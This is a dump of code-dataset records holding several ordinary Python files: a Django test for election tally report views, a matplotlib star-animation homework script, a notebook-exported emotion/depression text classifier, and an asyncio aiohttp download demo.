"pantomime.normalize_mimetype", "line_number": 64, "usage_type": "call"}, {"api_name": "pantomime.mimetype_extension", "line_number": 68, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 69, "usage_type": "call"}, {"api_name": "os.close", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 78, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 82, "usage_type": "name"}, {"api_name": "convert.converter.ConversionFailure", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "107541633", "text": "import json\n\nfrom django.test import RequestFactory\n\nfrom tally_ho.libs.permissions import groups\nfrom tally_ho.apps.tally.models.center import Center\nfrom tally_ho.apps.tally.models.candidate import Candidate\nfrom tally_ho.libs.models.enums.form_state import FormState\nfrom tally_ho.libs.models.enums.entry_version import EntryVersion\nfrom tally_ho.libs.models.enums.center_type import CenterType\nfrom tally_ho.apps.tally.views.reports import (\n administrative_areas_reports as admin_reports,\n)\nfrom tally_ho.libs.tests.test_base import (\n create_electrol_race, create_result_form, create_station,\\\n create_reconciliation_form, create_sub_constituency, create_tally,\\\n create_region, create_constituency, create_office, create_result,\\\n create_candidates, TestBase, create_ballot\n)\nfrom tally_ho.libs.tests.fixtures.electrol_race_data import (\n electrol_races\n)\n\n\n\nclass TestAdministrativeAreasReports(TestBase):\n def setUp(self):\n self.factory = RequestFactory()\n self._create_permission_groups()\n self._create_and_login_user()\n self._add_user_to_group(self.user, groups.TALLY_MANAGER)\n self.tally = create_tally()\n self.tally.users.add(self.user)\n self.electrol_race = create_electrol_race(\n self.tally,\n **electrol_races[0]\n )\n ballot = create_ballot(self.tally, electrol_race=self.electrol_race)\n self.region = create_region(tally=self.tally)\n office = create_office(tally=self.tally, region=self.region)\n self.constituency = create_constituency(tally=self.tally)\n self.sc =\\\n create_sub_constituency(code=1, field_office='1', ballots=[ballot])\n center, _ = Center.objects.get_or_create(\n code='1',\n mahalla='1',\n name='1',\n office=office,\n region='1',\n village='1',\n active=True,\n tally=self.tally,\n sub_constituency=self.sc,\n center_type=CenterType.GENERAL,\n constituency=self.constituency\n )\n self.station = create_station(\n center=center, registrants=20, tally=self.tally\n )\n self.result_form = create_result_form(\n tally=self.tally,\n form_state=FormState.ARCHIVED,\n office=office,\n center=center,\n station_number=self.station.station_number,\n ballot=ballot)\n self.recon_form = create_reconciliation_form(\n result_form=self.result_form,\n user=self.user,\n number_ballots_inside_box=20,\n number_cancelled_ballots=0,\n number_spoiled_ballots=0,\n number_unstamped_ballots=0,\n number_unused_ballots=0,\n number_valid_votes=20,\n number_invalid_votes=0,\n number_ballots_received=20,\n )\n votes = 20\n create_candidates(\n self.result_form, votes=votes, user=self.user,\n num_results=1, tally=self.tally\n )\n for result in self.result_form.results.all():\n result.entry_version = EntryVersion.FINAL\n result.save()\n # create duplicate final results\n create_result(self.result_form, result.candidate, self.user, votes)\n\n def test_sub_constituency_turn_out_and_votes_summary_reports(self):\n \"\"\"\n Test that the sub constituency turn out and votes summary reports are\n rendered as expected.\n \"\"\"\n # add\n view = admin_reports.SummaryReportDataView.as_view()\n request = self.factory.post('/sub-constituency-summary-report')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk\n )\n\n # Sub Constituency votes summary report tests\n code, valid_votes, invalid_votes, cancelled_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, ' | {} | '.format(self.sc.code))\n self.assertEquals(\n valid_votes,\n '{} | '.format(\n self.recon_form.number_valid_votes))\n self.assertEquals(\n invalid_votes,\n '{} | '.format(\n self.recon_form.number_invalid_votes))\n self.assertEquals(\n cancelled_votes,\n '{} | '.format(\n self.recon_form.number_cancelled_ballots))\n\n view = admin_reports.ProgressiveReportDataView.as_view()\n request = self.factory.get('/sub-cons-progressive-report-list')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk)\n candidates_count = Candidate.objects.filter(\n tally__id=self.tally.pk).count()\n\n # Sub Constituency progressive report tests\n code, num_candidates, num_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{} | '.format(self.sc.code))\n self.assertEquals(\n num_votes,\n '{} | '.format(\n self.result_form.num_votes))\n self.assertEquals(\n num_candidates,\n '{} | '.format(\n candidates_count))\n\n def apply_filter(self, data):\n view = admin_reports.ResultFormResultsListDataView.as_view()\n request = self.factory.post('/form-results', data=data)\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n )\n return response\n\n def test_result_form_result_list_data_view_filters(self):\n \"\"\"\n Test ResultFormResultsListDataView filters\n \"\"\"\n # test race type filter\n data = {\n \"data\": str(\n {\n \"election_level_names\":\n [\"Presidential\"],\n \"sub_race_type_names\":\n [\"ballot_number_presidential_runoff\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n data = {\n \"data\": str(\n {\n \"election_level_names\": [\"Presidential\"],\n \"sub_race_type_names\": [\"ballot_number_presidential\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test center filter\n data = {'data': '{\"select_1_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n center_id = self.station.center.id\n data = {'data': '{\"select_1_ids\": ' + f'[\"{center_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test stations filter\n data = {'data': '{\"select_2_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n station_id = self.station.id\n data = {'data': '{\"select_2_ids\": ' + f'[\"{station_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test ballot status filter\n data = {'data': '{\"ballot_status\": [\"not_available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"ballot_status\": [\"available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station filter\n data = {'data': '{\"station_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"station_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test candidate status\n data = {'data': '{\"candidate_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"candidate_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station percentage processed\n data = {'data': '{\"percentage_processed\": \"10\"}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n", "sub_path": "tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py", "file_name": "test_administrative_areas_reports.py", "file_ext": "py", "file_size_in_byte": 9528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tally_ho.libs.tests.test_base.TestBase", "line_number": 26, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 28, "usage_type": "call"}, {"api_name": "tally_ho.libs.permissions.groups.TALLY_MANAGER", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.permissions.groups", "line_number": 31, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_tally", "line_number": 32, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_electrol_race", "line_number": 34, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.fixtures.electrol_race_data.electrol_races", "line_number": 36, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_ballot", "line_number": 38, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_region", "line_number": 39, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_office", "line_number": 40, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_constituency", "line_number": 41, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_sub_constituency", "line_number": 43, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects.get_or_create", "line_number": 44, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.center.Center", "line_number": 44, "usage_type": "name"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType.GENERAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType", "line_number": 54, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_station", "line_number": 57, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_result_form", "line_number": 60, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState.ARCHIVED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState", "line_number": 62, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_reconciliation_form", "line_number": 67, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_candidates", "line_number": 80, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion.FINAL", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion", "line_number": 85, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_result", "line_number": 88, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView.as_view", "line_number": 96, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView.as_view", "line_number": 126, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 126, "usage_type": "name"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects.filter", "line_number": 134, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate", "line_number": 134, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 139, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView.as_view", "line_number": 154, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 154, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 180, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 197, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 202, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 233, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 239, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 249, "usage_type": "call"}]}
+{"seq_id": "261314306", "text": "\"\"\"\nDylan Copley\nMAE 5020\nHomework 1\nProblem 2\n\nSame polygon gen thing except it makes stars... Was showing off to a friend.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n#function that plots the polygon, then returns the decoded rgb and image property info\ndef polygon_anim(s):\n # defining angles\n angles = [(360 / (2 * s)) * n for n in range(0, 2 * s)]\n\n # defining points from angles, list comprehension except each value is a list itself. index 0 and 1 are x and y.\n points = [[np.cos(n * (np.pi / 180)), np.sin(n * (np.pi / 180))] for n in angles]\n\n # simply appending the last point as the initial point. This way when lines are needed to be drawn the last points\n # and the initial point will have its line drawn.\n points.append(points[0])\n\n #generated twice the number of angles/vertices. Every other vertice has half the radial length, creating star shape\n for n in range(0, len(points) - 1):\n #modulus operator to test if divisible by 2, same as saying \"every other\", or \"every even\"\n if n % 2 == 1:\n points[n][0] = points[n][0] / 2\n points[n][1] = points[n][1] / 2\n\n #defining a subplot to play around with draw modes\n fig, ax = plt.subplots()\n\n #for each point,\n for n in range(0,len(points)-1):\n #bit tricky to read,\n #plt.plot([x1,x2],[y1,y2],'red line solid dot points')\n #points[n][0] are x value, points[n][1] are y value.\n #have to do a ax subplot plot to send current frame\n ax.plot([points[n][0],points[n+1][0]],[points[n][1],points[n+1][1]],'ro-')\n\n\n #pretifying\n ax.set_title(\"Number of sides: \" + str(s))\n ax.grid(True)\n ax.set_xlim([-2,2])\n #took an image of plot window, discovered that the scaling ratio of x to y was about 1.343\n #this makes the x and y scales the same, and a prettier image.\n ax.set_ylim([-2/1.343,2/1.343])\n #showing origin\n ax.plot([0],[0],'bo')\n\n #maximize and grab current frame. I have no clue how I got this code, I borrowed it from an old program.\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n #return frame generated\n return image\n\n#getting root directory, need to save the gif file somewhere\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n#very scary function\n#imageio.mimsave((PATH),[list comprehension with each value being a current frame image],fps=n)\n#create a gif file stored in the root directory of the program.\n#list comprehension generating 27 polygons from 3 to 14. defined fps as 4.\n#image is saved as animated_polygon.gif. file will overwrite if program ran again\n\nimageio.mimsave((ROOT_DIR + \"\\\\animated_star.gif\"),[polygon_anim(s) for s in range(4,12)], fps=4)", "sub_path": "test_files/star_generator.py", "file_name": "star_generator.py", "file_ext": "py", "file_size_in_byte": 2836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "imageio.mimsave", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "273872550", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport re\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\nfh=open('isear.txt')\nlabel=[]\nsen=[]\nfor line in fh:\n lis=re.findall('[a-zA-Z]+',line)\n label.append(lis[0])\n sen.append(' '.join(lis[1:]))\n \n\n\n# In[3]:\n\n\nprint(label)\n\n\n# In[4]:\n\n\nprint(sen)\n\n\n# In[5]:\n\n\nimport csv\n\n\n# In[6]:\n\n\nwith open ('data2.csv','w') as f:\n writer=csv.writer(f)\n writer.writerows(zip(label,sen))\n\n\n# In[7]:\n\n\ndf=pd.read_csv('data2.csv')\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf.rename(columns={'ID':'label','CITY COUN SUBJ SEX AGE RELI PRAC FOCC MOCC FIEL EMOT WHEN LONG INTS ERGO TROPHO TEMPER EXPRES MOVE EXP EXP EXP PARAL CON EXPC PLEA PLAN FAIR CAUS COPING MORL SELF RELA VERBAL NEUTRO Field Field Field MYKEY SIT STATE':'sentence'},inplace=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\ndf.head()\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[12]:\n\n\n'''\nNot using NLTK as Spacy is more faster and accurate in Lemmatization and removing stop words.\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n setence=sentence.split()\n ws=WordLemmatizer()\n sentence=[ws.lemmatize(s) for s in sentence if not s in stopwords.words('english')]\n sentence=' '.join(sentence)\n corpus.append(sentence)'''\n\n\n# In[13]:\n\n\n\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\n\n# In[14]:\n\n\nprint(nlp.Defaults.stop_words)\n\n\n# In[ ]:\n\n\n\n\n\n# In[15]:\n\n\n# Removing stop words\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[16]:\n\n\ncorpus\n\n\n# In[17]:\n\n\n#Lemmatization\ncorpus2=[]\nfor i in range(7666):\n sent=nlp(corpus[i])\n \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[18]:\n\n\ncorpus2\n\n\n# In[19]:\n\n\ndf.head()\n\n\n# In[20]:\n\n\ndf['cleaned_sentence']=corpus2\n\n\n# In[21]:\n\n\ndf.head()\n\n\n# In[22]:\n\n\ndf.label.value_counts()\n\n\n# In[23]:\n\n\n#WordCloud Analysis\n\n\n# In[24]:\n\n\nget_ipython().system('pip install wordcloud')\nfrom wordcloud import WordCloud\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\n\n\n# In[25]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'sadness']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[26]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'joy']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[27]:\n\n\ndf['emotion'] = df['label'].apply(lambda c: 'Positive' if c =='sadness' else 'Negative')\n\n\n# In[28]:\n\n\ndf['emotion'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[29]:\n\n\ndf5=pd.read_csv('sentiment_tweets3.csv')\n\n\n# In[30]:\n\n\ndf5.head()\n\n\n# In[31]:\n\n\ndf5 = df5.drop(['Unnamed: 0'],axis=1)\n\n\n# In[32]:\n\n\ndf5.label.value_counts()\n\n\n# In[33]:\n\n\ndf5\n\n\n# In[34]:\n\n\ndf5=df5.iloc[6000:]\n\n\n# In[35]:\n\n\ndf5.info()\n\n\n# In[36]:\n\n\ncorpus=[]\nfor i in range(6000,10314):\n sentence=re.sub('[^a-zA-Z]', ' ',df5['message'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[37]:\n\n\ncorpus2=[]\nfor i in corpus:\n sent=nlp(i) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[38]:\n\n\nlen(corpus2)\n\n\n# In[39]:\n\n\ndf5['cleaned_sentence']=corpus2\n\n\n# In[40]:\n\n\ndf5=df5[['label','message','cleaned_sentence']]\n\n\n# In[41]:\n\n\ndf5.head()\n\n\n# In[42]:\n\n\ndf.head()\n\n\n# In[43]:\n\n\ndf5.rename(columns={'message':'sentence'},inplace=True)\n\n\n# In[44]:\n\n\ndf3=df5[df5['label']>=0]\n\n\n# In[45]:\n\n\ndf3.info()\n\n\n# In[46]:\n\n\ndf.info()\n\n\n# In[47]:\n\n\ndf4=df.append(df3)\n\n\n# In[48]:\n\n\ndf4.head()\n\n\n# In[49]:\n\n\ndf4['emotion'] = df4['label'].apply(lambda c: 'Positive' if c !=0 and c!='joy' else 'Negative')\n\n\n# In[50]:\n\n\ndf4.info()\n\n\n# In[51]:\n\n\ndf4['emotion'].value_counts()\n\n\n# In[52]:\n\n\ndf4.info()\n\n\n# In[53]:\n\n\ndf4.to_csv('cleaned_data.csv')\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n\nX = df4['cleaned_sentence']\ny = df4['emotion']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=42)\n\n\n# In[55]:\n\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC\n\ntext_clf = Pipeline([('tfidf', TfidfVectorizer()),\n ('clf', LinearSVC()),\n])\n\n# Feed the training data through the pipeline\ntext_clf.fit(X_train, y_train) \n\n\n# In[56]:\n\n\ndef process(str):\n corpus=[]\n \n sentence=re.sub('[^a-zA-Z]', ' ',str)\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n \n \n \n sent=nlp(sentence) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n return(sentence2)\n\n\n# In[57]:\n\n\nstring=str(input(\"Enter Message :\"))\nstring2=process(string) \nz=pd.Series(string2)\npredictions = text_clf.predict(z)\npredictions\n\n\n# In[58]:\n\n\npredictions2=text_clf.predict(X_test)\nfrom sklearn import metrics\nprint(metrics.confusion_matrix(y_test,predictions2))\n\n\n# In[59]:\n\n\nprint(metrics.classification_report(y_test,predictions2))\n\n\n# \n\n# In[60]:\n\n\nprint(metrics.accuracy_score(y_test,predictions2))\n\n\n# In[62]:\n\n\ndepressive_words = ' '.join(list(df4[df4['emotion'] == 'Negative']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=\"Set1\").generate(depressive_words)\nplt.figure(figsize = (10,8), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n", "sub_path": "DepressionAnalysis.py", "file_name": "DepressionAnalysis.py", "file_ext": "py", "file_size_in_byte": 6208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 135, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 212, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 224, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 265, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 309, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 435, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 446, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 459, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 489, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 489, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 495, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 495, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 503, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 503, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}]}
+{"seq_id": "168121368", "text": "import asyncio\nimport aiohttp\n\nasync def download(visits, site):\n count = 0\n for _ in range(visits):\n print(f\"downloading {site}\")\n async with aiohttp.ClientSession() as session:\n async with session.get(site) as response:\n html = await response.text()\n count += len(html)\n message = f\"{site} returned {count//1000}K characters\"\n return message\n\nasync def main():\n # note each download yields immediately so that other downloads \n # can run in parallel. main waits until all results are available\n response = await asyncio.gather(\n download(15, \"http://ibm.com\"),\n download(20, \"http://bbc.co.uk\"),\n download(25, \"http://abc.com\")\n )\n print(response)\n \nasyncio.run(main())\n\n", "sub_path": "src/17 Threading and Concurrency/AsyncIO/07.futures.py", "file_name": "07.futures.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 25, "usage_type": "call"}]}
